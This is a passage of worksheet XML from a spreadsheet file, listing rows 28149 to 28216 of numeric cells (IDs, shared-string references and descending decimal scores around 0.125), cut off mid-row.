      <c r="B28149" s="2">
        <v>9597841.0</v>
      </c>
      <c r="C28149" s="2" t="s">
        <v>27047</v>
      </c>
      <c r="D28149" s="2">
        <v>1.0</v>
      </c>
      <c r="E28149" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28149" s="2">
        <v>0.1271043771043771</v>
      </c>
    </row>
    <row r="28150" ht="15.75" customHeight="1">
      <c r="A28150" s="1">
        <v>12634.0</v>
      </c>
      <c r="B28150" s="2">
        <v>3.0294675E7</v>
      </c>
      <c r="C28150" s="2" t="s">
        <v>27048</v>
      </c>
      <c r="D28150" s="2">
        <v>1.0</v>
      </c>
      <c r="E28150" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28150" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="28151" ht="15.75" customHeight="1">
      <c r="A28151" s="1">
        <v>16474.0</v>
      </c>
      <c r="B28151" s="2">
        <v>4.6504704E7</v>
      </c>
      <c r="C28151" s="2" t="s">
        <v>27049</v>
      </c>
      <c r="D28151" s="2">
        <v>1.0</v>
      </c>
      <c r="E28151" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28151" s="2">
        <v>0.1268518518518518</v>
      </c>
    </row>
    <row r="28152" ht="15.75" customHeight="1">
      <c r="A28152" s="1">
        <v>33179.0</v>
      </c>
      <c r="B28152" s="2">
        <v>7105087.0</v>
      </c>
      <c r="C28152" s="2" t="s">
        <v>27050</v>
      </c>
      <c r="D28152" s="2">
        <v>1.0</v>
      </c>
      <c r="E28152" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28152" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="28153" ht="15.75" customHeight="1">
      <c r="A28153" s="1">
        <v>15392.0</v>
      </c>
      <c r="B28153" s="2">
        <v>4.2807649E7</v>
      </c>
      <c r="C28153" s="2" t="s">
        <v>27051</v>
      </c>
      <c r="D28153" s="2">
        <v>1.0</v>
      </c>
      <c r="E28153" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28153" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="28154" ht="15.75" customHeight="1">
      <c r="A28154" s="1">
        <v>5798.0</v>
      </c>
      <c r="B28154" s="2">
        <v>4.6784675E7</v>
      </c>
      <c r="C28154" s="2" t="s">
        <v>27052</v>
      </c>
      <c r="D28154" s="2">
        <v>1.0</v>
      </c>
      <c r="E28154" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28154" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="28155" ht="15.75" customHeight="1">
      <c r="A28155" s="1">
        <v>24771.0</v>
      </c>
      <c r="B28155" s="2">
        <v>1.1866925E7</v>
      </c>
      <c r="C28155" s="2" t="s">
        <v>27053</v>
      </c>
      <c r="D28155" s="2">
        <v>1.0</v>
      </c>
      <c r="E28155" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28155" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="28156" ht="15.75" customHeight="1">
      <c r="A28156" s="1">
        <v>26579.0</v>
      </c>
      <c r="B28156" s="2">
        <v>1.7912245E7</v>
      </c>
      <c r="C28156" s="2" t="s">
        <v>27054</v>
      </c>
      <c r="D28156" s="2">
        <v>1.0</v>
      </c>
      <c r="E28156" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28156" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="28157" ht="15.75" customHeight="1">
      <c r="A28157" s="1">
        <v>33194.0</v>
      </c>
      <c r="B28157" s="2">
        <v>7137926.0</v>
      </c>
      <c r="C28157" s="2" t="s">
        <v>27055</v>
      </c>
      <c r="D28157" s="2">
        <v>1.0</v>
      </c>
      <c r="E28157" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28157" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="28158" ht="15.75" customHeight="1">
      <c r="A28158" s="1">
        <v>18700.0</v>
      </c>
      <c r="B28158" s="2">
        <v>5.3624444E7</v>
      </c>
      <c r="C28158" s="2" t="s">
        <v>27056</v>
      </c>
      <c r="D28158" s="2">
        <v>1.0</v>
      </c>
      <c r="E28158" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28158" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="28159" ht="15.75" customHeight="1">
      <c r="A28159" s="1">
        <v>31941.0</v>
      </c>
      <c r="B28159" s="2">
        <v>5.3074114E7</v>
      </c>
      <c r="C28159" s="2" t="s">
        <v>27057</v>
      </c>
      <c r="D28159" s="2">
        <v>1.0</v>
      </c>
      <c r="E28159" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28159" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="28160" ht="15.75" customHeight="1">
      <c r="A28160" s="1">
        <v>32898.0</v>
      </c>
      <c r="B28160" s="2">
        <v>6395523.0</v>
      </c>
      <c r="C28160" s="2" t="s">
        <v>27058</v>
      </c>
      <c r="D28160" s="2">
        <v>1.0</v>
      </c>
      <c r="E28160" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28160" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="28161" ht="15.75" customHeight="1">
      <c r="A28161" s="1">
        <v>14255.0</v>
      </c>
      <c r="B28161" s="2">
        <v>3.8387812E7</v>
      </c>
      <c r="C28161" s="2" t="s">
        <v>27059</v>
      </c>
      <c r="D28161" s="2">
        <v>1.0</v>
      </c>
      <c r="E28161" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28161" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="28162" ht="15.75" customHeight="1">
      <c r="A28162" s="1">
        <v>33245.0</v>
      </c>
      <c r="B28162" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C28162" s="2" t="s">
        <v>27060</v>
      </c>
      <c r="D28162" s="2">
        <v>1.0</v>
      </c>
      <c r="E28162" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28162" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="28163" ht="15.75" customHeight="1">
      <c r="A28163" s="1">
        <v>2868.0</v>
      </c>
      <c r="B28163" s="2">
        <v>3.5569432E7</v>
      </c>
      <c r="C28163" s="2" t="s">
        <v>27061</v>
      </c>
      <c r="D28163" s="2">
        <v>1.0</v>
      </c>
      <c r="E28163" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28163" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28164" ht="15.75" customHeight="1">
      <c r="A28164" s="1">
        <v>5390.0</v>
      </c>
      <c r="B28164" s="2">
        <v>4.5443718E7</v>
      </c>
      <c r="C28164" s="2" t="s">
        <v>27062</v>
      </c>
      <c r="D28164" s="2">
        <v>1.0</v>
      </c>
      <c r="E28164" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28164" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28165" ht="15.75" customHeight="1">
      <c r="A28165" s="1">
        <v>6168.0</v>
      </c>
      <c r="B28165" s="2">
        <v>4.7883151E7</v>
      </c>
      <c r="C28165" s="2" t="s">
        <v>27063</v>
      </c>
      <c r="D28165" s="2">
        <v>1.0</v>
      </c>
      <c r="E28165" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28165" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28166" ht="15.75" customHeight="1">
      <c r="A28166" s="1">
        <v>12904.0</v>
      </c>
      <c r="B28166" s="2">
        <v>3.207467E7</v>
      </c>
      <c r="C28166" s="2" t="s">
        <v>27064</v>
      </c>
      <c r="D28166" s="2">
        <v>1.0</v>
      </c>
      <c r="E28166" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28166" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28167" ht="15.75" customHeight="1">
      <c r="A28167" s="1">
        <v>15950.0</v>
      </c>
      <c r="B28167" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C28167" s="2" t="s">
        <v>27065</v>
      </c>
      <c r="D28167" s="2">
        <v>1.0</v>
      </c>
      <c r="E28167" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28167" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28168" ht="15.75" customHeight="1">
      <c r="A28168" s="1">
        <v>17923.0</v>
      </c>
      <c r="B28168" s="2">
        <v>5.116018E7</v>
      </c>
      <c r="C28168" s="2" t="s">
        <v>27066</v>
      </c>
      <c r="D28168" s="2">
        <v>1.0</v>
      </c>
      <c r="E28168" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28168" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28169" ht="15.75" customHeight="1">
      <c r="A28169" s="1">
        <v>19322.0</v>
      </c>
      <c r="B28169" s="2">
        <v>5.5308181E7</v>
      </c>
      <c r="C28169" s="2" t="s">
        <v>27067</v>
      </c>
      <c r="D28169" s="2">
        <v>1.0</v>
      </c>
      <c r="E28169" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28169" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28170" ht="15.75" customHeight="1">
      <c r="A28170" s="1">
        <v>23004.0</v>
      </c>
      <c r="B28170" s="2">
        <v>4.9746253E7</v>
      </c>
      <c r="C28170" s="2" t="s">
        <v>27068</v>
      </c>
      <c r="D28170" s="2">
        <v>1.0</v>
      </c>
      <c r="E28170" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28170" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28171" ht="15.75" customHeight="1">
      <c r="A28171" s="1">
        <v>24875.0</v>
      </c>
      <c r="B28171" s="2">
        <v>1.2228573E7</v>
      </c>
      <c r="C28171" s="2" t="s">
        <v>27069</v>
      </c>
      <c r="D28171" s="2">
        <v>1.0</v>
      </c>
      <c r="E28171" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28171" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28172" ht="15.75" customHeight="1">
      <c r="A28172" s="1">
        <v>25738.0</v>
      </c>
      <c r="B28172" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C28172" s="2" t="s">
        <v>27070</v>
      </c>
      <c r="D28172" s="2">
        <v>1.0</v>
      </c>
      <c r="E28172" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28172" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28173" ht="15.75" customHeight="1">
      <c r="A28173" s="1">
        <v>30094.0</v>
      </c>
      <c r="B28173" s="2">
        <v>3640807.0</v>
      </c>
      <c r="C28173" s="2" t="s">
        <v>27071</v>
      </c>
      <c r="D28173" s="2">
        <v>1.0</v>
      </c>
      <c r="E28173" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28173" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28174" ht="15.75" customHeight="1">
      <c r="A28174" s="1">
        <v>32337.0</v>
      </c>
      <c r="B28174" s="2">
        <v>5588985.0</v>
      </c>
      <c r="C28174" s="2" t="s">
        <v>27072</v>
      </c>
      <c r="D28174" s="2">
        <v>1.0</v>
      </c>
      <c r="E28174" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28174" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28175" ht="15.75" customHeight="1">
      <c r="A28175" s="1">
        <v>33283.0</v>
      </c>
      <c r="B28175" s="2">
        <v>7450287.0</v>
      </c>
      <c r="C28175" s="2" t="s">
        <v>27073</v>
      </c>
      <c r="D28175" s="2">
        <v>1.0</v>
      </c>
      <c r="E28175" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28175" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="28176" ht="15.75" customHeight="1">
      <c r="A28176" s="1">
        <v>13279.0</v>
      </c>
      <c r="B28176" s="2">
        <v>3.4404921E7</v>
      </c>
      <c r="C28176" s="2" t="s">
        <v>27074</v>
      </c>
      <c r="D28176" s="2">
        <v>1.0</v>
      </c>
      <c r="E28176" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28176" s="2">
        <v>0.1259780907668232</v>
      </c>
    </row>
    <row r="28177" ht="15.75" customHeight="1">
      <c r="A28177" s="1">
        <v>14133.0</v>
      </c>
      <c r="B28177" s="2">
        <v>3.7898733E7</v>
      </c>
      <c r="C28177" s="2" t="s">
        <v>27075</v>
      </c>
      <c r="D28177" s="2">
        <v>1.0</v>
      </c>
      <c r="E28177" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28177" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="28178" ht="15.75" customHeight="1">
      <c r="A28178" s="1">
        <v>615.0</v>
      </c>
      <c r="B28178" s="2">
        <v>1.9450497E7</v>
      </c>
      <c r="C28178" s="2" t="s">
        <v>27076</v>
      </c>
      <c r="D28178" s="2">
        <v>1.0</v>
      </c>
      <c r="E28178" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28178" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28179" ht="15.75" customHeight="1">
      <c r="A28179" s="1">
        <v>1143.0</v>
      </c>
      <c r="B28179" s="2">
        <v>2.4289022E7</v>
      </c>
      <c r="C28179" s="2" t="s">
        <v>27077</v>
      </c>
      <c r="D28179" s="2">
        <v>1.0</v>
      </c>
      <c r="E28179" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28179" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28180" ht="15.75" customHeight="1">
      <c r="A28180" s="1">
        <v>3782.0</v>
      </c>
      <c r="B28180" s="2">
        <v>3.9919894E7</v>
      </c>
      <c r="C28180" s="2" t="s">
        <v>27078</v>
      </c>
      <c r="D28180" s="2">
        <v>1.0</v>
      </c>
      <c r="E28180" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28180" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28181" ht="15.75" customHeight="1">
      <c r="A28181" s="1">
        <v>6108.0</v>
      </c>
      <c r="B28181" s="2">
        <v>4.7735631E7</v>
      </c>
      <c r="C28181" s="2" t="s">
        <v>27079</v>
      </c>
      <c r="D28181" s="2">
        <v>1.0</v>
      </c>
      <c r="E28181" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28181" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28182" ht="15.75" customHeight="1">
      <c r="A28182" s="1">
        <v>6506.0</v>
      </c>
      <c r="B28182" s="2">
        <v>4.8742985E7</v>
      </c>
      <c r="C28182" s="2" t="s">
        <v>27080</v>
      </c>
      <c r="D28182" s="2">
        <v>1.0</v>
      </c>
      <c r="E28182" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28182" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28183" ht="15.75" customHeight="1">
      <c r="A28183" s="1">
        <v>8410.0</v>
      </c>
      <c r="B28183" s="2">
        <v>5.3893437E7</v>
      </c>
      <c r="C28183" s="2" t="s">
        <v>27081</v>
      </c>
      <c r="D28183" s="2">
        <v>1.0</v>
      </c>
      <c r="E28183" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28183" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28184" ht="15.75" customHeight="1">
      <c r="A28184" s="1">
        <v>13520.0</v>
      </c>
      <c r="B28184" s="2">
        <v>3.5495137E7</v>
      </c>
      <c r="C28184" s="2" t="s">
        <v>27082</v>
      </c>
      <c r="D28184" s="2">
        <v>1.0</v>
      </c>
      <c r="E28184" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28184" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28185" ht="15.75" customHeight="1">
      <c r="A28185" s="1">
        <v>14962.0</v>
      </c>
      <c r="B28185" s="2">
        <v>4.1335409E7</v>
      </c>
      <c r="C28185" s="2" t="s">
        <v>27083</v>
      </c>
      <c r="D28185" s="2">
        <v>1.0</v>
      </c>
      <c r="E28185" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28185" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28186" ht="15.75" customHeight="1">
      <c r="A28186" s="1">
        <v>19668.0</v>
      </c>
      <c r="B28186" s="2">
        <v>5.6371664E7</v>
      </c>
      <c r="C28186" s="2" t="s">
        <v>27084</v>
      </c>
      <c r="D28186" s="2">
        <v>1.0</v>
      </c>
      <c r="E28186" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28186" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28187" ht="15.75" customHeight="1">
      <c r="A28187" s="1">
        <v>19830.0</v>
      </c>
      <c r="B28187" s="2">
        <v>5.7048533E7</v>
      </c>
      <c r="C28187" s="2" t="s">
        <v>27085</v>
      </c>
      <c r="D28187" s="2">
        <v>1.0</v>
      </c>
      <c r="E28187" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28187" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28188" ht="15.75" customHeight="1">
      <c r="A28188" s="1">
        <v>23059.0</v>
      </c>
      <c r="B28188" s="2">
        <v>5.0315353E7</v>
      </c>
      <c r="C28188" s="2" t="s">
        <v>27086</v>
      </c>
      <c r="D28188" s="2">
        <v>1.0</v>
      </c>
      <c r="E28188" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28188" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28189" ht="15.75" customHeight="1">
      <c r="A28189" s="1">
        <v>24778.0</v>
      </c>
      <c r="B28189" s="2">
        <v>1.1897829E7</v>
      </c>
      <c r="C28189" s="2" t="s">
        <v>27087</v>
      </c>
      <c r="D28189" s="2">
        <v>1.0</v>
      </c>
      <c r="E28189" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28189" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28190" ht="15.75" customHeight="1">
      <c r="A28190" s="1">
        <v>26049.0</v>
      </c>
      <c r="B28190" s="2">
        <v>1.5513514E7</v>
      </c>
      <c r="C28190" s="2" t="s">
        <v>27088</v>
      </c>
      <c r="D28190" s="2">
        <v>1.0</v>
      </c>
      <c r="E28190" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28190" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28191" ht="15.75" customHeight="1">
      <c r="A28191" s="1">
        <v>26064.0</v>
      </c>
      <c r="B28191" s="2">
        <v>1.5546825E7</v>
      </c>
      <c r="C28191" s="2" t="s">
        <v>27089</v>
      </c>
      <c r="D28191" s="2">
        <v>1.0</v>
      </c>
      <c r="E28191" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28191" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28192" ht="15.75" customHeight="1">
      <c r="A28192" s="1">
        <v>27262.0</v>
      </c>
      <c r="B28192" s="2">
        <v>2.1164051E7</v>
      </c>
      <c r="C28192" s="2" t="s">
        <v>27090</v>
      </c>
      <c r="D28192" s="2">
        <v>1.0</v>
      </c>
      <c r="E28192" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28192" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28193" ht="15.75" customHeight="1">
      <c r="A28193" s="1">
        <v>27910.0</v>
      </c>
      <c r="B28193" s="2">
        <v>2.3731247E7</v>
      </c>
      <c r="C28193" s="2" t="s">
        <v>27091</v>
      </c>
      <c r="D28193" s="2">
        <v>1.0</v>
      </c>
      <c r="E28193" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28193" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28194" ht="15.75" customHeight="1">
      <c r="A28194" s="1">
        <v>28003.0</v>
      </c>
      <c r="B28194" s="2">
        <v>2.4324114E7</v>
      </c>
      <c r="C28194" s="2" t="s">
        <v>27092</v>
      </c>
      <c r="D28194" s="2">
        <v>1.0</v>
      </c>
      <c r="E28194" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28194" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28195" ht="15.75" customHeight="1">
      <c r="A28195" s="1">
        <v>30476.0</v>
      </c>
      <c r="B28195" s="2">
        <v>3.9697308E7</v>
      </c>
      <c r="C28195" s="2" t="s">
        <v>27093</v>
      </c>
      <c r="D28195" s="2">
        <v>1.0</v>
      </c>
      <c r="E28195" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28195" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28196" ht="15.75" customHeight="1">
      <c r="A28196" s="1">
        <v>31086.0</v>
      </c>
      <c r="B28196" s="2">
        <v>4.8412612E7</v>
      </c>
      <c r="C28196" s="2" t="s">
        <v>27094</v>
      </c>
      <c r="D28196" s="2">
        <v>1.0</v>
      </c>
      <c r="E28196" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28196" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28197" ht="15.75" customHeight="1">
      <c r="A28197" s="1">
        <v>31377.0</v>
      </c>
      <c r="B28197" s="2">
        <v>4.9951199E7</v>
      </c>
      <c r="C28197" s="2" t="s">
        <v>27095</v>
      </c>
      <c r="D28197" s="2">
        <v>1.0</v>
      </c>
      <c r="E28197" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28197" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28198" ht="15.75" customHeight="1">
      <c r="A28198" s="1">
        <v>31715.0</v>
      </c>
      <c r="B28198" s="2">
        <v>5210923.0</v>
      </c>
      <c r="C28198" s="2" t="s">
        <v>27096</v>
      </c>
      <c r="D28198" s="2">
        <v>1.0</v>
      </c>
      <c r="E28198" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28198" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28199" ht="15.75" customHeight="1">
      <c r="A28199" s="1">
        <v>32460.0</v>
      </c>
      <c r="B28199" s="2">
        <v>5677131.0</v>
      </c>
      <c r="C28199" s="2" t="s">
        <v>27097</v>
      </c>
      <c r="D28199" s="2">
        <v>1.0</v>
      </c>
      <c r="E28199" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28199" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28200" ht="15.75" customHeight="1">
      <c r="A28200" s="1">
        <v>33515.0</v>
      </c>
      <c r="B28200" s="2">
        <v>8080671.0</v>
      </c>
      <c r="C28200" s="2" t="s">
        <v>27098</v>
      </c>
      <c r="D28200" s="2">
        <v>1.0</v>
      </c>
      <c r="E28200" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28200" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28201" ht="15.75" customHeight="1">
      <c r="A28201" s="1">
        <v>33653.0</v>
      </c>
      <c r="B28201" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C28201" s="2" t="s">
        <v>27099</v>
      </c>
      <c r="D28201" s="2">
        <v>1.0</v>
      </c>
      <c r="E28201" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28201" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28202" ht="15.75" customHeight="1">
      <c r="A28202" s="1">
        <v>33796.0</v>
      </c>
      <c r="B28202" s="2">
        <v>8782419.0</v>
      </c>
      <c r="C28202" s="2" t="s">
        <v>27100</v>
      </c>
      <c r="D28202" s="2">
        <v>1.0</v>
      </c>
      <c r="E28202" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28202" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="28203" ht="15.75" customHeight="1">
      <c r="A28203" s="1">
        <v>8586.0</v>
      </c>
      <c r="B28203" s="2">
        <v>5.4231043E7</v>
      </c>
      <c r="C28203" s="2" t="s">
        <v>27101</v>
      </c>
      <c r="D28203" s="2">
        <v>1.0</v>
      </c>
      <c r="E28203" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28203" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="28204" ht="15.75" customHeight="1">
      <c r="A28204" s="1">
        <v>20359.0</v>
      </c>
      <c r="B28204" s="2">
        <v>1.1699821E7</v>
      </c>
      <c r="C28204" s="2" t="s">
        <v>27102</v>
      </c>
      <c r="D28204" s="2">
        <v>1.0</v>
      </c>
      <c r="E28204" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28204" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="28205" ht="15.75" customHeight="1">
      <c r="A28205" s="1">
        <v>24717.0</v>
      </c>
      <c r="B28205" s="2">
        <v>1.169982E7</v>
      </c>
      <c r="C28205" s="2" t="s">
        <v>27102</v>
      </c>
      <c r="D28205" s="2">
        <v>1.0</v>
      </c>
      <c r="E28205" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28205" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="28206" ht="15.75" customHeight="1">
      <c r="A28206" s="1">
        <v>33855.0</v>
      </c>
      <c r="B28206" s="2">
        <v>9043430.0</v>
      </c>
      <c r="C28206" s="2" t="s">
        <v>27103</v>
      </c>
      <c r="D28206" s="2">
        <v>1.0</v>
      </c>
      <c r="E28206" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28206" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="28207" ht="15.75" customHeight="1">
      <c r="A28207" s="1">
        <v>14567.0</v>
      </c>
      <c r="B28207" s="2">
        <v>4.0059117E7</v>
      </c>
      <c r="C28207" s="2" t="s">
        <v>27104</v>
      </c>
      <c r="D28207" s="2">
        <v>1.0</v>
      </c>
      <c r="E28207" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28207" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="28208" ht="15.75" customHeight="1">
      <c r="A28208" s="1">
        <v>13842.0</v>
      </c>
      <c r="B28208" s="2">
        <v>3.6828287E7</v>
      </c>
      <c r="C28208" s="2" t="s">
        <v>27105</v>
      </c>
      <c r="D28208" s="2">
        <v>1.0</v>
      </c>
      <c r="E28208" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28208" s="2">
        <v>0.1250000000000001</v>
      </c>
    </row>
    <row r="28209" ht="15.75" customHeight="1">
      <c r="A28209" s="1">
        <v>2050.0</v>
      </c>
      <c r="B28209" s="2">
        <v>3.0938991E7</v>
      </c>
      <c r="C28209" s="2" t="s">
        <v>27106</v>
      </c>
      <c r="D28209" s="2">
        <v>1.0</v>
      </c>
      <c r="E28209" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28209" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="28210" ht="15.75" customHeight="1">
      <c r="A28210" s="1">
        <v>4108.0</v>
      </c>
      <c r="B28210" s="2">
        <v>4.1336594E7</v>
      </c>
      <c r="C28210" s="2" t="s">
        <v>27107</v>
      </c>
      <c r="D28210" s="2">
        <v>1.0</v>
      </c>
      <c r="E28210" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28210" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="28211" ht="15.75" customHeight="1">
      <c r="A28211" s="1">
        <v>25130.0</v>
      </c>
      <c r="B28211" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C28211" s="2" t="s">
        <v>27108</v>
      </c>
      <c r="D28211" s="2">
        <v>1.0</v>
      </c>
      <c r="E28211" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28211" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="28212" ht="15.75" customHeight="1">
      <c r="A28212" s="1">
        <v>27981.0</v>
      </c>
      <c r="B28212" s="2">
        <v>2.4036093E7</v>
      </c>
      <c r="C28212" s="2" t="s">
        <v>27109</v>
      </c>
      <c r="D28212" s="2">
        <v>1.0</v>
      </c>
      <c r="E28212" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28212" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="28213" ht="15.75" customHeight="1">
      <c r="A28213" s="1">
        <v>1672.0</v>
      </c>
      <c r="B28213" s="2">
        <v>2.8309891E7</v>
      </c>
      <c r="C28213" s="2" t="s">
        <v>27110</v>
      </c>
      <c r="D28213" s="2">
        <v>1.0</v>
      </c>
      <c r="E28213" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28213" s="2">
        <v>0.1247987117552335</v>
      </c>
    </row>
    <row r="28214" ht="15.75" customHeight="1">
      <c r="A28214" s="1">
        <v>13558.0</v>
      </c>
      <c r="B28214" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C28214" s="2" t="s">
        <v>27111</v>
      </c>
      <c r="D28214" s="2">
        <v>1.0</v>
      </c>
      <c r="E28214" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28214" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="28215" ht="15.75" customHeight="1">
      <c r="A28215" s="1">
        <v>25403.0</v>
      </c>
      <c r="B28215" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C28215" s="2" t="s">
        <v>27112</v>
      </c>
      <c r="D28215" s="2">
        <v>1.0</v>
      </c>
      <c r="E28215" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28215" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="28216" ht="15.75" customHeight="1">
      <c r="A28216" s="1">
        <v>27951.0</v>
      </c>
      <c r="B28216" s="2">
        <v>2.3863092E7</v>
      </c>
